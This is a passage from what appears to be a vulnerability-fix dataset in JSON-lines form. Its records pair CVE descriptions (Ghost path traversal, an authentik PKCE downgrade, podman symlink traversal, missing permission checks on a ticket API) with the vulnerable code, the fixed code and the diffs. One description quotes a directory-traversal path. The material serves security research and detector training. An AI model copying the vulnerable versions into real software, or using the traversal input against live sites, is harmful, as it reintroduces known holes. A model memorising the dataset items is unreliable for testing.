router.delete('/api/v2/tickets/deleted/:id', apiv2Auth, isAdmin, apiv2.tickets.permDelete)\n\n // Groups\n router.get('/api/v2/groups', apiv2Auth, apiv2.groups.get)\n router.post('/api/v2/groups', apiv2Auth, canUser('groups:create'), apiv2.groups.create)\n router.put('/api/v2/groups/:id', apiv2Auth, canUser('groups:update'), apiv2.groups.update)\n router.delete('/api/v2/groups/:id', apiv2Auth, canUser('groups:delete'), apiv2.groups.delete)\n\n // Teams\n router.get('/api/v2/teams', apiv2Auth, canUser('teams:view'), apiv2.teams.get)\n router.post('/api/v2/teams', apiv2Auth, canUser('teams:create'), apiv2.teams.create)\n router.put('/api/v2/teams/:id', apiv2Auth, canUser('teams:update'), apiv2.teams.update)\n router.delete('/api/v2/teams/:id', apiv2Auth, canUser('teams:delete'), apiv2.teams.delete)\n\n // Departments\n router.get('/api/v2/departments', apiv2Auth, canUser('departments:view'), apiv2.departments.get)\n router.post('/api/v2/departments', apiv2Auth, canUser('departments:create'), apiv2.departments.create)\n router.put('/api/v2/departments/:id', apiv2Auth, canUser('departments:update'), apiv2.departments.update)\n router.delete('/api/v2/departments/:id', apiv2Auth, canUser('departments:delete'), apiv2.departments.delete)\n\n // Notices\n router.get('/api/v2/notices', apiv2Auth, apiv2.notices.get)\n router.put('/api/v2/notices/:id', apiv2Auth, canUser('notices:update'), apiv2.notices.update)\n router.put('/api/v2/notices/:id/activate', apiv2Auth, canUser('notices:activate'), apiv2.notices.activate)\n router.get('/api/v2/notices/clear', apiv2Auth, canUser('notices:deactivate'), apiv2.notices.clear)\n router.delete('/api/v2/notices/:id', apiv2Auth, canUser('notices:delete'), apiv2.notices.delete)\n\n // ElasticSearch\n router.get('/api/v2/es/search', middleware.api, apiv2.elasticsearch.search)\n router.get('/api/v2/es/rebuild', apiv2Auth, isAdmin, apiv2.elasticsearch.rebuild)\n router.get('/api/v2/es/status', apiv2Auth, isAdmin, apiv2.elasticsearch.status)\n\n router.get('/api/v2/mailer/check', apiv2Auth, isAdmin, apiv2.mailer.check)\n}"}], "vul_patch": "--- a/src/controllers/api/v2/routes.js\n+++ b/src/controllers/api/v2/routes.js\n@@ -12,37 +12,37 @@\n router.post('/api/v2/token', controllers.api.v2.common.token)\n \n // Accounts\n- router.get('/api/v2/accounts', apiv2Auth, apiv2.accounts.get)\n- router.post('/api/v2/accounts', apiv2Auth, apiv2.accounts.create)\n- router.put('/api/v2/accounts/:username', apiv2Auth, apiv2.accounts.update)\n+ router.get('/api/v2/accounts', apiv2Auth, canUser('accounts:view'), apiv2.accounts.get)\n+ router.post('/api/v2/accounts', apiv2Auth, canUser('accounts:create'), apiv2.accounts.create)\n+ router.put('/api/v2/accounts/:username', canUser('accounts:update'), apiv2Auth, apiv2.accounts.update)\n \n // Tickets\n- router.get('/api/v2/tickets', apiv2Auth, apiv2.tickets.get)\n- router.post('/api/v2/tickets', apiv2Auth, apiv2.tickets.create)\n+ router.get('/api/v2/tickets', apiv2Auth, canUser('tickets:view'), apiv2.tickets.get)\n+ router.post('/api/v2/tickets', apiv2Auth, canUser('tickets:create'), apiv2.tickets.create)\n router.post('/api/v2/tickets/transfer/:uid', apiv2Auth, isAdmin, apiv2.tickets.transferToThirdParty)\n- router.get('/api/v2/tickets/:uid', apiv2Auth, apiv2.tickets.single)\n- router.put('/api/v2/tickets/batch', apiv2Auth, apiv2.tickets.batchUpdate)\n- router.put('/api/v2/tickets/:uid', apiv2Auth, apiv2.tickets.update)\n- router.delete('/api/v2/tickets/:uid', apiv2Auth, apiv2.tickets.delete)\n+ router.get('/api/v2/tickets/:uid', apiv2Auth, canUser('tickets:view'), apiv2.tickets.single)\n+ router.put('/api/v2/tickets/batch', apiv2Auth, canUser('tickets:update'), apiv2.tickets.batchUpdate)\n+ router.put('/api/v2/tickets/:uid', apiv2Auth, canUser('tickets:update'), apiv2.tickets.update)\n+ router.delete('/api/v2/tickets/:uid', apiv2Auth, canUser('tickets:delete'), apiv2.tickets.delete)\n router.delete('/api/v2/tickets/deleted/:id', apiv2Auth, isAdmin, apiv2.tickets.permDelete)\n \n // Groups\n router.get('/api/v2/groups', apiv2Auth, apiv2.groups.get)\n- router.post('/api/v2/groups', apiv2Auth, apiv2.groups.create)\n- router.put('/api/v2/groups/:id', apiv2Auth, apiv2.groups.update)\n- router.delete('/api/v2/groups/:id', apiv2Auth, apiv2.groups.delete)\n+ router.post('/api/v2/groups', apiv2Auth, canUser('groups:create'), apiv2.groups.create)\n+ router.put('/api/v2/groups/:id', apiv2Auth, canUser('groups:update'), apiv2.groups.update)\n+ router.delete('/api/v2/groups/:id', apiv2Auth, canUser('groups:delete'), apiv2.groups.delete)\n \n // Teams\n- router.get('/api/v2/teams', apiv2Auth, apiv2.teams.get)\n- router.post('/api/v2/teams', apiv2Auth, apiv2.teams.create)\n- router.put('/api/v2/teams/:id', apiv2Auth, apiv2.teams.update)\n- router.delete('/api/v2/teams/:id', apiv2Auth, apiv2.teams.delete)\n+ router.get('/api/v2/teams', apiv2Auth, canUser('teams:view'), apiv2.teams.get)\n+ router.post('/api/v2/teams', apiv2Auth, canUser('teams:create'), apiv2.teams.create)\n+ router.put('/api/v2/teams/:id', apiv2Auth, canUser('teams:update'), apiv2.teams.update)\n+ router.delete('/api/v2/teams/:id', apiv2Auth, canUser('teams:delete'), apiv2.teams.delete)\n \n // Departments\n- router.get('/api/v2/departments', apiv2Auth, apiv2.departments.get)\n- router.post('/api/v2/departments', apiv2Auth, apiv2.departments.create)\n- router.put('/api/v2/departments/:id', apiv2Auth, apiv2.departments.update)\n- router.delete('/api/v2/departments/:id', apiv2Auth, apiv2.departments.delete)\n+ router.get('/api/v2/departments', apiv2Auth, canUser('departments:view'), apiv2.departments.get)\n+ router.post('/api/v2/departments', apiv2Auth, canUser('departments:create'), apiv2.departments.create)\n+ router.put('/api/v2/departments/:id', apiv2Auth, canUser('departments:update'), apiv2.departments.update)\n+ router.delete('/api/v2/departments/:id', apiv2Auth, canUser('departments:delete'), apiv2.departments.delete)\n \n // Notices\n router.get('/api/v2/notices', apiv2Auth, apiv2.notices.get)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-32235", "cve_description": "Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/TryGhost/Ghost", "patch_url": ["https://github.com/TryGhost/Ghost/commit/378dd913aa8d0fd0da29b0ffced8884579598b0f"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_290_1", "commit": "c99016fd2fca58eaacbebb9dca6c974aabaa67f6", "file_path": "ghost/core/core/frontend/web/middleware/static-theme.js", "start_line": 17, "end_line": 26, "snippet": "function isAllowedFile(file) {\n const allowedFiles = ['manifest.json'];\n const allowedPath = '/assets/';\n const alwaysDeny = ['.hbs'];\n\n const ext = path.extname(file);\n const base = path.basename(file);\n\n return allowedFiles.includes(base) || (file.startsWith(allowedPath) && !alwaysDeny.includes(ext));\n}"}], "fix_func": [{"id": "fix_js_290_1", "commit": "378dd913aa8d0fd0da29b0ffced8884579598b0f", "file_path": "ghost/core/core/frontend/web/middleware/static-theme.js", "start_line": 40, "end_line": 56, "snippet": "function isAllowedFile(file) {\n const decodedFilePath = decode(file);\n if (decodedFilePath === -1) {\n return false;\n }\n\n const normalizedFilePath = path.normalize(decodedFilePath);\n\n const allowedFiles = ['manifest.json'];\n const allowedPath = '/assets/';\n const alwaysDeny = ['.hbs'];\n\n const ext = path.extname(normalizedFilePath);\n const base = path.basename(normalizedFilePath);\n\n return allowedFiles.includes(base) || (normalizedFilePath.startsWith(allowedPath) && !alwaysDeny.includes(ext));\n}"}], "vul_patch": "--- a/ghost/core/core/frontend/web/middleware/static-theme.js\n+++ b/ghost/core/core/frontend/web/middleware/static-theme.js\n@@ -1,10 +1,17 @@\n function isAllowedFile(file) {\n+ const decodedFilePath = decode(file);\n+ if (decodedFilePath === -1) {\n+ return false;\n+ }\n+\n+ const normalizedFilePath = path.normalize(decodedFilePath);\n+\n const allowedFiles = ['manifest.json'];\n const allowedPath = '/assets/';\n const alwaysDeny = ['.hbs'];\n \n- const ext = path.extname(file);\n- const base = path.basename(file);\n+ const ext = path.extname(normalizedFilePath);\n+ const base = path.basename(normalizedFilePath);\n \n- return allowedFiles.includes(base) || (file.startsWith(allowedPath) && !alwaysDeny.includes(ext));\n+ return allowedFiles.includes(base) || (normalizedFilePath.startsWith(allowedPath) && !alwaysDeny.includes(ext));\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-23647", "cve_description": "Authentik is an open-source Identity Provider. There is a bug in our implementation of PKCE that allows an attacker to circumvent the protection that PKCE offers. PKCE adds the code_challenge parameter to the authorization request and adds the code_verifier parameter to the token request. Prior to 2023.8.7 and 2023.10.7, a downgrade scenario is possible: if the attacker removes the code_challenge parameter from the authorization request, authentik will not do the PKCE check. Because of this bug, an attacker can circumvent the protection PKCE offers, such as CSRF attacks and code injection attacks. Versions 2023.8.7 and 2023.10.7 fix the issue.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/goauthentik/authentik", "patch_url": ["https://github.com/goauthentik/authentik/commit/38e04ae12720e5d81b4f7ac77997eb8d1275d31a"], "programing_language": "Python", "vul_func": [{"id": "vul_py_289_1", "commit": "dca8c83", "file_path": "authentik/providers/oauth2/views/token.py", "start_line": 173, "end_line": 247, "snippet": " def __post_init_code(self, raw_code: str, request: HttpRequest):\n if not raw_code:\n LOGGER.warning(\"Missing authorization code\")\n raise TokenError(\"invalid_grant\")\n\n allowed_redirect_urls = self.provider.redirect_uris.split()\n # At this point, no provider should have a blank redirect_uri, in case they do\n # this will check an empty array and raise an error\n try:\n if not any(fullmatch(x, self.redirect_uri) for x in allowed_redirect_urls):\n LOGGER.warning(\n \"Invalid redirect uri (regex comparison)\",\n redirect_uri=self.redirect_uri,\n expected=allowed_redirect_urls,\n )\n Event.new(\n EventAction.CONFIGURATION_ERROR,\n message=\"Invalid redirect URI used by provider\",\n provider=self.provider,\n redirect_uri=self.redirect_uri,\n expected=allowed_redirect_urls,\n ).from_http(request)\n raise TokenError(\"invalid_client\")\n except RegexError as exc:\n LOGGER.info(\"Failed to parse regular expression, checking directly\", exc=exc)\n if not any(x == self.redirect_uri for x in allowed_redirect_urls):\n LOGGER.warning(\n \"Invalid redirect uri (strict comparison)\",\n redirect_uri=self.redirect_uri,\n expected=allowed_redirect_urls,\n )\n Event.new(\n EventAction.CONFIGURATION_ERROR,\n message=\"Invalid redirect_uri configured\",\n provider=self.provider,\n ).from_http(request)\n raise TokenError(\"invalid_client\")\n\n # Check against forbidden schemes\n if urlparse(self.redirect_uri).scheme in FORBIDDEN_URI_SCHEMES:\n raise TokenError(\"invalid_request\")\n\n self.authorization_code = AuthorizationCode.objects.filter(code=raw_code).first()\n if not self.authorization_code:\n LOGGER.warning(\"Code does not exist\", code=raw_code)\n raise TokenError(\"invalid_grant\")\n\n if self.authorization_code.is_expired:\n LOGGER.warning(\n \"Code is expired\",\n token=raw_code,\n )\n raise TokenError(\"invalid_grant\")\n\n if self.authorization_code.provider != self.provider or self.authorization_code.is_expired:\n LOGGER.warning(\"Invalid code: invalid client or code has expired\")\n raise TokenError(\"invalid_grant\")\n\n # Validate PKCE parameters.\n if self.authorization_code.code_challenge:\n # Authorization code had PKCE but we didn't get one\n if not self.code_verifier:\n raise TokenError(\"invalid_request\")\n if self.authorization_code.code_challenge_method == PKCE_METHOD_S256:\n new_code_challenge = (\n urlsafe_b64encode(sha256(self.code_verifier.encode(\"ascii\")).digest())\n .decode(\"utf-8\")\n .replace(\"=\", \"\")\n )\n else:\n new_code_challenge = self.code_verifier\n\n if new_code_challenge != self.authorization_code.code_challenge:\n LOGGER.warning(\"Code challenge not matching\")\n raise TokenError(\"invalid_grant\")"}], "fix_func": [{"id": "fix_py_289_1", "commit": "38e04ae12720e5d81b4f7ac77997eb8d1275d31a", "file_path": "authentik/providers/oauth2/views/token.py", "start_line": 173, "end_line": 251, "snippet": " def __post_init_code(self, raw_code: str, request: HttpRequest):\n if not raw_code:\n LOGGER.warning(\"Missing authorization code\")\n raise TokenError(\"invalid_grant\")\n\n allowed_redirect_urls = self.provider.redirect_uris.split()\n # At this point, no provider should have a blank redirect_uri, in case they do\n # this will check an empty array and raise an error\n try:\n if not any(fullmatch(x, self.redirect_uri) for x in allowed_redirect_urls):\n LOGGER.warning(\n \"Invalid redirect uri (regex comparison)\",\n redirect_uri=self.redirect_uri,\n expected=allowed_redirect_urls,\n )\n Event.new(\n EventAction.CONFIGURATION_ERROR,\n message=\"Invalid redirect URI used by provider\",\n provider=self.provider,\n redirect_uri=self.redirect_uri,\n expected=allowed_redirect_urls,\n ).from_http(request)\n raise TokenError(\"invalid_client\")\n except RegexError as exc:\n LOGGER.info(\"Failed to parse regular expression, checking directly\", exc=exc)\n if not any(x == self.redirect_uri for x in allowed_redirect_urls):\n LOGGER.warning(\n \"Invalid redirect uri (strict comparison)\",\n redirect_uri=self.redirect_uri,\n expected=allowed_redirect_urls,\n )\n Event.new(\n EventAction.CONFIGURATION_ERROR,\n message=\"Invalid redirect_uri configured\",\n provider=self.provider,\n ).from_http(request)\n raise TokenError(\"invalid_client\")\n\n # Check against forbidden schemes\n if urlparse(self.redirect_uri).scheme in FORBIDDEN_URI_SCHEMES:\n raise TokenError(\"invalid_request\")\n\n self.authorization_code = AuthorizationCode.objects.filter(code=raw_code).first()\n if not self.authorization_code:\n LOGGER.warning(\"Code does not exist\", code=raw_code)\n raise TokenError(\"invalid_grant\")\n\n if self.authorization_code.is_expired:\n LOGGER.warning(\n \"Code is expired\",\n token=raw_code,\n )\n raise TokenError(\"invalid_grant\")\n\n if self.authorization_code.provider != self.provider or self.authorization_code.is_expired:\n LOGGER.warning(\"Invalid code: invalid client or code has expired\")\n raise TokenError(\"invalid_grant\")\n\n # Validate PKCE parameters.\n if self.authorization_code.code_challenge:\n # Authorization code had PKCE but we didn't get one\n if not self.code_verifier:\n raise TokenError(\"invalid_grant\")\n if self.authorization_code.code_challenge_method == PKCE_METHOD_S256:\n new_code_challenge = (\n urlsafe_b64encode(sha256(self.code_verifier.encode(\"ascii\")).digest())\n .decode(\"utf-8\")\n .replace(\"=\", \"\")\n )\n else:\n new_code_challenge = self.code_verifier\n\n if new_code_challenge != self.authorization_code.code_challenge:\n LOGGER.warning(\"Code challenge not matching\")\n raise TokenError(\"invalid_grant\")\n # Token request had a code_verifier but code did not have a code challenge\n # Prevent downgrade\n if not self.authorization_code.code_challenge and self.code_verifier:\n raise TokenError(\"invalid_grant\")"}], "vul_patch": "--- a/authentik/providers/oauth2/views/token.py\n+++ b/authentik/providers/oauth2/views/token.py\n@@ -60,7 +60,7 @@\n if self.authorization_code.code_challenge:\n # Authorization code had PKCE but we didn't get one\n if not self.code_verifier:\n- raise TokenError(\"invalid_request\")\n+ raise TokenError(\"invalid_grant\")\n if self.authorization_code.code_challenge_method == PKCE_METHOD_S256:\n new_code_challenge = (\n urlsafe_b64encode(sha256(self.code_verifier.encode(\"ascii\")).digest())\n@@ -73,3 +73,7 @@\n if new_code_challenge != self.authorization_code.code_challenge:\n LOGGER.warning(\"Code challenge not matching\")\n raise TokenError(\"invalid_grant\")\n+ # Token request had a code_verifier but code did not have a code challenge\n+ # Prevent downgrade\n+ if not self.authorization_code.code_challenge and self.code_verifier:\n+ raise TokenError(\"invalid_grant\")\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-10152", "cve_description": "A path traversal vulnerability has been discovered in podman before version 1.4.0 in the way it handles symlinks inside containers. An attacker who has compromised an existing container can cause arbitrary files on the host filesystem to be read/written when an administrator tries to copy a file from/to the container.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/containers/libpod", "patch_url": ["https://github.com/containers/libpod/commit/2dcfd3df0b58463b050385c0ccd7929c540bce21"], "programing_language": "Go", "vul_func": [{"id": "vul_go_139_1", "commit": "7358a4c", "file_path": "cmd/podman/cliconfig/create.go", "start_line": 24, "end_line": 27, "snippet": "type CpValues struct {\n\tPodmanCommand\n\tExtract bool\n}"}, {"id": "vul_go_139_2", "commit": "7358a4c", "file_path": "cmd/podman/cp.go", "start_line": 48, "end_line": 55, "snippet": "func init() {\n\tcpCommand.Command = _cpCommand\n\tflags := cpCommand.Flags()\n\tflags.BoolVar(&cpCommand.Extract, \"extract\", false, \"Extract the tar file into the destination directory.\")\n\tcpCommand.SetHelpTemplate(HelpTemplate())\n\tcpCommand.SetUsageTemplate(UsageTemplate())\n\trootCmd.AddCommand(cpCommand.Command)\n}"}, {"id": "vul_go_139_3", "commit": "7358a4c", "file_path": "cmd/podman/cp.go", "start_line": 57, "end_line": 71, "snippet": "func cpCmd(c *cliconfig.CpValues) error {\n\targs := c.InputArgs\n\tif len(args) != 2 {\n\t\treturn errors.Errorf(\"you must provide a source path and a destination path\")\n\t}\n\n\truntime, err := libpodruntime.GetRuntime(getContext(), &c.PodmanCommand)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"could not get runtime\")\n\t}\n\tdefer runtime.Shutdown(false)\n\n\textract := c.Flag(\"extract\").Changed\n\treturn copyBetweenHostAndContainer(runtime, args[0], args[1], extract)\n}"}, {"id": "vul_go_139_4", "commit": "7358a4c", "file_path": "cmd/podman/cp.go", "start_line": 73, "end_line": 158, "snippet": "func copyBetweenHostAndContainer(runtime *libpod.Runtime, src string, dest string, extract bool) error {\n\n\tsrcCtr, srcPath := parsePath(runtime, src)\n\tdestCtr, destPath := parsePath(runtime, dest)\n\n\tif (srcCtr == nil && destCtr == nil) || (srcCtr != nil && destCtr != nil) {\n\t\treturn errors.Errorf(\"invalid arguments %s, %s you must use just one container\", src, dest)\n\t}\n\n\tif len(srcPath) == 0 || len(destPath) == 0 {\n\t\treturn errors.Errorf(\"invalid arguments %s, %s you must specify paths\", src, dest)\n\t}\n\tctr := srcCtr\n\tisFromHostToCtr := (ctr == nil)\n\tif isFromHostToCtr {\n\t\tctr = destCtr\n\t}\n\n\tmountPoint, err := ctr.Mount()\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer ctr.Unmount(false)\n\tuser, err := getUser(mountPoint, ctr.User())\n\tif err != nil {\n\t\treturn err\n\t}\n\tidMappingOpts, err := ctr.IDMappings()\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"error getting IDMappingOptions\")\n\t}\n\tcontainerOwner := idtools.IDPair{UID: int(user.UID), GID: int(user.GID)}\n\thostUID, hostGID, err := util.GetHostIDs(convertIDMap(idMappingOpts.UIDMap), convertIDMap(idMappingOpts.GIDMap), user.UID, user.GID)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\thostOwner := idtools.IDPair{UID: int(hostUID), GID: int(hostGID)}\n\n\tvar glob []string\n\tif isFromHostToCtr {\n\t\tif filepath.IsAbs(destPath) {\n\t\t\tdestPath = filepath.Join(mountPoint, destPath)\n\n\t\t} else {\n\t\t\tif err = idtools.MkdirAllAndChownNew(filepath.Join(mountPoint, ctr.WorkingDir()), 0755, hostOwner); err != nil {\n\t\t\t\treturn errors.Wrapf(err, \"error creating directory %q\", destPath)\n\t\t\t}\n\t\t\tdestPath = filepath.Join(mountPoint, ctr.WorkingDir(), destPath)\n\t\t}\n\t} else {\n\t\tif filepath.IsAbs(srcPath) {\n\t\t\tsrcPath = filepath.Join(mountPoint, srcPath)\n\t\t} else {\n\t\t\tsrcPath = filepath.Join(mountPoint, ctr.WorkingDir(), srcPath)\n\t\t}\n\t}\n\tglob, err = filepath.Glob(srcPath)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"invalid glob %q\", srcPath)\n\t}\n\tif len(glob) == 0 {\n\t\tglob = append(glob, srcPath)\n\t}\n\tif !filepath.IsAbs(destPath) {\n\t\tdir, err := os.Getwd()\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"err getting current working directory\")\n\t\t}\n\t\tdestPath = filepath.Join(dir, destPath)\n\t}\n\n\tvar lastError error\n\tfor _, src := range glob {\n\t\tif src == \"-\" {\n\t\t\tsrc = os.Stdin.Name()\n\t\t\textract = true\n\t\t}\n\t\terr := copy(src, destPath, dest, idMappingOpts, &containerOwner, extract, isFromHostToCtr)\n\t\tif lastError != nil {\n\t\t\tlogrus.Error(lastError)\n\t\t}\n\t\tlastError = err\n\t}\n\treturn lastError\n}"}], "fix_func": [{"id": "fix_go_139_1", "commit": "2dcfd3d", "file_path": "cmd/podman/cliconfig/create.go", "start_line": 24, "end_line": 28, "snippet": "type CpValues struct {\n\tPodmanCommand\n\tExtract bool\n\tPause bool\n}"}, {"id": "fix_go_139_2", "commit": "2dcfd3d", "file_path": "cmd/podman/cp.go", "start_line": 50, "end_line": 58, "snippet": "func init() {\n\tcpCommand.Command = _cpCommand\n\tflags := cpCommand.Flags()\n\tflags.BoolVar(&cpCommand.Extract, \"extract\", false, \"Extract the tar file into the destination directory.\")\n\tflags.BoolVar(&cpCommand.Pause, \"pause\", true, \"Pause the container while copying\")\n\tcpCommand.SetHelpTemplate(HelpTemplate())\n\tcpCommand.SetUsageTemplate(UsageTemplate())\n\trootCmd.AddCommand(cpCommand.Command)\n}"}, {"id": "fix_go_139_3", "commit": "2dcfd3d", "file_path": "cmd/podman/cp.go", "start_line": 60, "end_line": 73, "snippet": "func cpCmd(c *cliconfig.CpValues) error {\n\targs := c.InputArgs\n\tif len(args) != 2 {\n\t\treturn errors.Errorf(\"you must provide a source path and a destination path\")\n\t}\n\n\truntime, err := libpodruntime.GetRuntime(getContext(), &c.PodmanCommand)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"could not get runtime\")\n\t}\n\tdefer runtime.Shutdown(false)\n\n\treturn copyBetweenHostAndContainer(runtime, args[0], args[1], c.Extract, c.Pause)\n}"}, {"id": "fix_go_139_4", "commit": "2dcfd3d", "file_path": "cmd/podman/cp.go", "start_line": 75, "end_line": 211, "snippet": "func copyBetweenHostAndContainer(runtime *libpod.Runtime, src string, dest string, extract bool, pause bool) error {\n\n\tsrcCtr, srcPath := parsePath(runtime, src)\n\tdestCtr, destPath := parsePath(runtime, dest)\n\n\tif (srcCtr == nil && destCtr == nil) || (srcCtr != nil && destCtr != nil) {\n\t\treturn errors.Errorf(\"invalid arguments %s, %s you must use just one container\", src, dest)\n\t}\n\n\tif len(srcPath) == 0 || len(destPath) == 0 {\n\t\treturn errors.Errorf(\"invalid arguments %s, %s you must specify paths\", src, dest)\n\t}\n\tctr := srcCtr\n\tisFromHostToCtr := (ctr == nil)\n\tif isFromHostToCtr {\n\t\tctr = destCtr\n\t}\n\n\tmountPoint, err := ctr.Mount()\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer ctr.Unmount(false)\n\n\t// We can't pause rootless containers.\n\tif pause && rootless.IsRootless() {\n\t\tstate, err := ctr.State()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif state == libpod.ContainerStateRunning {\n\t\t\treturn errors.Errorf(\"cannot copy into running rootless container with pause set - pass --pause=false to force copying\")\n\t\t}\n\t}\n\n\tif pause && !rootless.IsRootless() {\n\t\tif err := ctr.Pause(); err != nil {\n\t\t\t// An invalid state error is fine.\n\t\t\t// The container isn't running or is already paused.\n\t\t\t// TODO: We can potentially start the container while\n\t\t\t// the copy is running, which still allows a race where\n\t\t\t// malicious code could mess with the symlink.\n\t\t\tif errors.Cause(err) != libpod.ErrCtrStateInvalid {\n\t\t\t\treturn err\n\t\t\t}\n\t\t} else if err == nil {\n\t\t\t// Only add the defer if we actually paused\n\t\t\tdefer func() {\n\t\t\t\tif err := ctr.Unpause(); err != nil {\n\t\t\t\t\tlogrus.Errorf(\"Error unpausing container after copying: %v\", err)\n\t\t\t\t}\n\t\t\t}()\n\t\t}\n\t}\n\n\tuser, err := getUser(mountPoint, ctr.User())\n\tif err != nil {\n\t\treturn err\n\t}\n\tidMappingOpts, err := ctr.IDMappings()\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"error getting IDMappingOptions\")\n\t}\n\tcontainerOwner := idtools.IDPair{UID: int(user.UID), GID: int(user.GID)}\n\thostUID, hostGID, err := util.GetHostIDs(convertIDMap(idMappingOpts.UIDMap), convertIDMap(idMappingOpts.GIDMap), user.UID, user.GID)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\thostOwner := idtools.IDPair{UID: int(hostUID), GID: int(hostGID)}\n\n\tvar glob []string\n\tif isFromHostToCtr {\n\t\tif filepath.IsAbs(destPath) {\n\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, destPath)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdestPath = cleanedPath\n\t\t} else {\n\t\t\tctrWorkDir, err := securejoin.SecureJoin(mountPoint, ctr.WorkingDir())\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err = idtools.MkdirAllAndChownNew(ctrWorkDir, 0755, hostOwner); err != nil {\n\t\t\t\treturn errors.Wrapf(err, \"error creating directory %q\", destPath)\n\t\t\t}\n\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, filepath.Join(ctr.WorkingDir(), destPath))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdestPath = cleanedPath\n\t\t}\n\t} else {\n\t\tif filepath.IsAbs(srcPath) {\n\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, srcPath)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tsrcPath = cleanedPath\n\t\t} else {\n\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, filepath.Join(ctr.WorkingDir(), srcPath))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tsrcPath = cleanedPath\n\t\t}\n\t}\n\tglob, err = filepath.Glob(srcPath)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"invalid glob %q\", srcPath)\n\t}\n\tif len(glob) == 0 {\n\t\tglob = append(glob, srcPath)\n\t}\n\tif !filepath.IsAbs(destPath) {\n\t\tdir, err := os.Getwd()\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"err getting current working directory\")\n\t\t}\n\t\tdestPath = filepath.Join(dir, destPath)\n\t}\n\n\tvar lastError error\n\tfor _, src := range glob {\n\t\tif src == \"-\" {\n\t\t\tsrc = os.Stdin.Name()\n\t\t\textract = true\n\t\t}\n\t\terr := copy(src, destPath, dest, idMappingOpts, &containerOwner, extract, isFromHostToCtr)\n\t\tif lastError != nil {\n\t\t\tlogrus.Error(lastError)\n\t\t}\n\t\tlastError = err\n\t}\n\treturn lastError\n}"}], "vul_patch": "--- a/cmd/podman/cliconfig/create.go\n+++ b/cmd/podman/cliconfig/create.go\n@@ -1,4 +1,5 @@\n type CpValues struct {\n \tPodmanCommand\n \tExtract bool\n+\tPause bool\n }\n\n--- a/cmd/podman/cp.go\n+++ b/cmd/podman/cp.go\n@@ -2,6 +2,7 @@\n \tcpCommand.Command = _cpCommand\n \tflags := cpCommand.Flags()\n \tflags.BoolVar(&cpCommand.Extract, \"extract\", false, \"Extract the tar file into the destination directory.\")\n+\tflags.BoolVar(&cpCommand.Pause, \"pause\", true, \"Pause the container while copying\")\n \tcpCommand.SetHelpTemplate(HelpTemplate())\n \tcpCommand.SetUsageTemplate(UsageTemplate())\n \trootCmd.AddCommand(cpCommand.Command)\n\n--- a/cmd/podman/cp.go\n+++ b/cmd/podman/cp.go\n@@ -10,6 +10,5 @@\n \t}\n \tdefer runtime.Shutdown(false)\n \n-\textract := c.Flag(\"extract\").Changed\n-\treturn copyBetweenHostAndContainer(runtime, args[0], args[1], extract)\n+\treturn copyBetweenHostAndContainer(runtime, args[0], args[1], c.Extract, c.Pause)\n }\n\n--- a/cmd/podman/cp.go\n+++ b/cmd/podman/cp.go\n@@ -1,4 +1,4 @@\n-func copyBetweenHostAndContainer(runtime *libpod.Runtime, src string, dest string, extract bool) error {\n+func copyBetweenHostAndContainer(runtime *libpod.Runtime, src string, dest string, extract bool, pause bool) error {\n \n \tsrcCtr, srcPath := parsePath(runtime, src)\n \tdestCtr, destPath := parsePath(runtime, dest)\n@@ -21,6 +21,38 @@\n \t\treturn err\n \t}\n \tdefer ctr.Unmount(false)\n+\n+\t// We can't pause rootless containers.\n+\tif pause && rootless.IsRootless() {\n+\t\tstate, err := ctr.State()\n+\t\tif err != nil {\n+\t\t\treturn err\n+\t\t}\n+\t\tif state == libpod.ContainerStateRunning {\n+\t\t\treturn errors.Errorf(\"cannot copy into running rootless container with pause set - pass --pause=false to force copying\")\n+\t\t}\n+\t}\n+\n+\tif pause && !rootless.IsRootless() {\n+\t\tif err := ctr.Pause(); err != nil {\n+\t\t\t// An invalid state error is fine.\n+\t\t\t// The container isn't running or is already paused.\n+\t\t\t// TODO: We can potentially start the container while\n+\t\t\t// the copy is running, which still allows a race 